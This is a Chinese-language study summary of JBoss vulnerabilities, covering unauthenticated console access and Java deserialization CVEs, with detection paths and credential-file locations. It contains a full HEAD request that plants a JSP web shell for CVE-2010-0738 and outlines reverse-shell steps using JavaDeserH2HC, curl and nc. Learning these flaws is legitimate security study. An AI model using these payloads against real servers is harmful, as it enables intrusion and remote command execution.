JBoss漏洞总结

近期遇到一次考核，两题都是关于jboss的相关漏洞，虽然都复现过，毕竟脑子有限，所以记录一下，有不对的地方欢迎指正

jboss一般有2种类型的的漏洞：

a.访问控制不严导致的漏洞
b.反序列化漏洞

Jboss管理控制台说明

jboss 4.x 及其之前的版本 console 管理路径为 /jmx-console/ 和 /web-console/

jmx-console的配置文件为：
/opt/jboss/jboss4/server/default/deploy/jmx-console.war/WEB-INF/jboss-web.xml
web-console的配置文件为：
/opt/jboss/jboss4/server/default/deploy/management/console-mgr.sar/web-console.war/WEB-INF/jboss-web.xml
一定要注意不同网站之间jboss的绝对路径一定是有区别的

jboss的控制台账号密码说明

jmx-console 和 web-console的账户密码相同密码文件保存在一下路径下：

/opt/jboss/jboss4/server/default/conf/props/jmx-console-users.properties

1：访问控制不严导致的漏洞

a ：JMX Console未授权访问Getshell

漏洞描述：
由于JBoss中/jmx-console/HtmlAdaptor路径对外开放，并且没有任何身份验证机制，导致攻击者可以进⼊到jmx控制台，并在其中执⾏任何功能
影响版本：
Jboss4.x以下版本。
利用方式：
Jboxx4.x /jmx-console/ 后台存在未授权访问，进入后台后，可直接部署 war 包Getshell。若需登录，可以尝试爆破弱口令登录（类似于tomcat的War包配置漏洞）
注：因为没有环境：操作方式就略过。

b ：JMX Console HtmlAdaptor Getshell（CVE-2007-1036）

漏洞描述：
此漏洞主要是由于JBoss中/jmx-console/HtmlAdaptor路径对外开放，并且没有任何身份验证机制，导致攻击者可以进⼊到jmx控制台，并在其中执⾏任何功能。
该漏洞利⽤的是后台中jboss.admin -> DeploymentFileRepository -> store()利用⽅法，
通过向四个参数传⼊信息，达到上传shell的⽬的，
其中arg0传⼊的是部署的war包名字，
arg1传⼊的是上传的⽂件的⽂件名，
arg2传⼊的是上传⽂件的⽂件格式，
arg3传⼊的是上传⽂件中的内容。
通过控制这四个参数即可上传shell，控制整台服务器
影响版本：
Jboss4.x以下
漏洞利用：
输⼊url

http://目标IP:8080/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.admin:service=DeploymentFileRepository

定位到store⽅法

注：后面的CVE-2010-0738和CVE-2006-5750漏洞也存在这一特性。

c ：JMX控制台安全验证绕过漏洞（CVE-2010-0738）

漏洞描述：
该漏洞利⽤⽅法跟CVE-2007-1036⼀样，只是绕过了get和post传输限制，⽤
head传输⽅式发送payload
影响版本：
jboss4.2.0、jboss 4.3.0
漏洞利用：
利⽤head传输⽅式，payload如下：

HEAD /jmx-console/HtmlAdaptor?
action=invokeOp&name=jboss.admin:service=DeploymentFileRepository&methodIn
dex=6&arg0=../jmx-console.war/&arg1=hax0rwin&arg2=.jsp&arg3=
<%Runtime.getRuntime().exec(request.getParameter("i"));%>&arg4=True
HTTP/1.1
Host: hostx:portx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9)
Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive

d ：CVE-2006-5750

漏洞描述：
此漏洞利用原理和CVE-2007-1036漏洞相同，唯一的区别是CVE-2006-5750漏洞利用methodIndex进行store()方法的调用。其中methodIndex是通过方法的编号进行调用。

以下是高版本的jboss后台

Jboss5.x/6.x控制台
Jboss5.x开始弃用了 web-console ，增加了 admin-console。
jboss5.x / 6.x 版本 console 路径为 /jmx-console/ 和 /admin-console/。
jmx-console的配置文件为：

	jboss/common/deploy/jmx-console.war/WEB-INF/jboss-web.xml  #jboss的绝对路径不同网站不一样

admin-console的配置文件为：

   jboss/common/deploy/admin-console.war/WEB-INF/jboss-web.xml   #jboss的绝对路径不同网站不一样

控制台账号密码：
jmx-console 和 web-console 共用一个账号密码 ，账号密码文件该路径下

jboss/server/default/conf/props/jmx-console-users.properties

Jboss 5.x/6.x admin-Console后台部署war包Getshell：
Jboss5.X开始，jmx-console不能部署war包了，需要admin-console后台部署

2：反序列化漏洞。

a :JBoss JMXInvokerServlet 反序列化漏洞(CVE-2015-7501)：

这是经典的 JBoss 反序列化漏洞
漏洞描述：
JBoss在 /invoker/JMXInvokerServlet 请求中读取了用户传入的对象，
然后我们可以利用 Apache Commons Collections 中的 Gadget 执行任意代码。
由于JBoss中invoker/JMXInvokerServlet路径对外开放，JBoss的jmx组件⽀持Java反序列化
影响版本：
实际上主要集中在 jboss 6.x 版本上:

Apache Group Commons Collections 4.0 
Apache Group Commons Collections 3.2.1 
Apache Group Commons Collections

漏洞探测方法：
此漏洞存在于JBoss中 /invoker/JMXInvokerServlet 路径。访问若提示下载 JMXInvokerServlet，则可能存在漏洞。
之后的步骤：简要说明

1：下面使用JavaDeserH2HC 生成反弹 shell 的 payload
2：进行文件编译
生成载荷的序列化文件xx.ser(反弹shell到我们的vps)
利用curl提交我们的ser文件
3：vps使用nc监听端口成功反弹

b:JBoss EJBInvokerServlet CVE-2013-4810 反序列化漏洞

此漏洞和CVE-2015-7501漏洞原理相同，
两者的区别
就在于两个漏洞选择的进行其中JMXInvokerServlet和EJBInvokerServlet利用的是org.jboss.invocation.MarshalledValue进行的反序列化操作，
而web-console/Invoker利用的是org.jboss.console.remote.RemoteMBeanInvocation进行反序列化并上传构造的文件。
影响版本
实际上主要集中在 jboss 6.x 版本上:

	Apache Group Commons Collections 4.0 
	Apache Group Commons Collections 3.2.1 
	Apache Group Commons Collections

漏洞利用：
同CVE-2015-7501利⽤⽅法⼀样，只是路径不⼀样，这个漏洞利⽤路径是 /invoker/EJBInvokerServlet

c：JBOSSMQ JMS CVE-2017-7504 集群反序列化漏洞 4.X

漏洞描述：
JBoss AS 4.x及之前版本中，JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java⽂件存在反序列化漏洞，
远程攻击者可借助特制的序列化数据利⽤该漏洞执⾏任意代码。
影响版本
JBoss AS 4.x及之前版本
漏洞利用
1、 首先验证目标jboss是否存在此漏洞,直接访问 /jbossmq-httpil/HTTPServerILServlet 路径下。若访问200，则可能存在漏洞。
使用工具：此处我们使用JavaDeserH2HC工具来利用该漏洞,尝试直接弹回一个shell。

d ：JBoss 5.x/6.x CVE-2017-12149 反序列化漏洞

漏洞描述：
该漏洞为 Java反序列化错误类型，存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中。
该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化，从而导致了漏洞。
该漏洞出现在**/invoker/readonly**请求中，服务器将用户提交的POST内容进行了Java反序列化,导致传入的携带恶意代码的序列化数据执行。
影响版本
JbossAS 5.x
JbossAS 6.x
漏洞验证POC：
http://目标:8080/invoker/readonly 如果出现报 500 错误,则说明目标机器可能存在此漏洞
还可以利用现成工具：CVE-2017-12149 jboss反序列化v1.0探测
然后使用 javadeserh2hc 完成利用过程

-----------------------------------------------分割线------------------------------------------------------------

最后如果有不对的地方欢迎大家指正，近期会发表关于zabbix的漏洞复现